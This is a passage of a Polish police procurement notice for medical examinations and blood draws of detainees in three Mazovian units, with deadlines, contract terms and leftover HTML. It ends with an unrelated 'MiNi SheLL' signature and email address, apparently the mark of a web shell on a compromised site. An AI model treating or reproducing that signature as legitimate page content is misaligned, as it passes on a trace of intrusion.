Zamawiający dopuszcza zmianę wysokości wynagrodzenia należnego Wykonawcy, w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją zamówienia tj. wzrostu lub obniżenia względem ceny lub kosztu dla wynagrodzenia ofertowego, w oparciu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych określonych przez GUS, dotyczący cen wpływających na realizację przedmiotu usługi. Nowe wynagrodzenie obowiązuje od dnia podpisania aneksu do umowy, z zastrzeżeniem, że pierwsza waloryzacja może nastąpić nie wcześniej niż po upływie 12 miesięcy od dnia zawarcia umowy. ... z uwagi na ograniczoną ilość znaków pozostałe zapisy znajdują się na stronie prowadzonego postępowania https://platformazakupowa.pl/pn/kwp_radom <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kwp_radom</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-17 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wykluczy wykonawcę z postępowania, w przypadkach wskazanych w przepisie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2023 r., poz. 129 z późn. zm.).<br/>2. Termin wykonania zamówienia.<br/>Wykonawca zobowiązany jest zrealizować przedmiot zamówienia w terminie: <br/>Zadanie nr 1 KPP BIAŁOBRZEGI: 36 miesięcy od dnia zawarcia umowy <br/>Zadanie nr 2 KPP MŁAWA, KPP ŻUROMIN: 36 miesięcy od dnia 29.12.2025 r. <br/>Zadanie nr 3 KMP Ostrołęka: 36 miesięcy od dnia 01.10.2025 r.<br/><br/>Dopuszcza się wydłużenie czasu trwania umowy maksymalnie o kolejne 12 miesięcy w sytuacji niewykorzystania przez zamawiającego kwoty określonej w umowie. <br/><br/>3. Zamawiający przewiduje składanie ofert częściowych: TAK<br/>Liczba części zamówienia zgodnie z dokumentami zamówienia wynosi: 3<br/>świadczenie usług medycznych w zakresie badań lekarskich, pobrań krwi osób zatrzymanych przez Policję dla podległych jednostek KPP garnizonu mazowieckiego dla<br/>zadanie nr 1 KPP Białobrzegi<br/>zadanie nr 2 KPP Mława, KPP Żuromin – pomieszczenie dla osób zatrzymanych znajduje się w KPP Mława<br/>zadanie nr 3 KMP Ostrołęka<br/>4. Zamawiający	wymaga zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy. - Szczegółowe wymagania dotyczące realizacji oraz egzekwowania wymogu zatrudnienia na podstawie stosunku pracy zostały określone w projekcie umowy, tj. załącznik nr 2 do SWZ.<br/>5. 13)	Zamawiający wyraża zgodę na przesyłanie ustrukturyzowanych faktur elektronicznych <br/>za pośrednictwem Platformy Elektronicznego Fakturowania(indywidualny identyfikator <br/>o numerze PEPPOL GLN 5907714353628).

Creat By MiNi SheLL
Email: jattceo@gmail.com